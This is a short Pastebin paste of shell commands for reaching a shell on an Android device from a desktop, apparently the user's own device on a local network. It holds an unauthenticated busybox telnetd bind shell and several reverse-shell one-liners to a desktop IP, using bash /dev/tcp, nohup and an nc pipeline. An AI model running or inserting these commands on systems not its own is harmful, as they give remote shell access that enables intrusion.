Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Remote shell option on Android
- # On Android Device
- busybox telnetd -l /system/bin/sh -p 8823
- # or if bash is installed
- busybox telnetd -l /system_ext/bin/bash -p 8823
- # When Done
- killall telnetd
- # On Desktop
- telnet 192.168.1.126 8823
- # Reverse Shell without telnet using toybox nc
- # On Desktop
- nc -nlvp 4444
- # On Android Device
- #start bash first then run command
- bash
- bash -i >& /dev/tcp/<Desktop IP>/4444 0>&1
- # this will disconnect when shell is closed
- # to keep it open, use nohup
- nohup bash -c bash -i >& /dev/tcp/192.168.1.158/4444 0>&1
- # without bash
- # on desktop setup server in separate shells
- nc -nlvp 4444
- nc -nlvp 4445
- #on android device
- nc 192.168.1.158 4444|sh|nc 192.168.1.158 4445
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement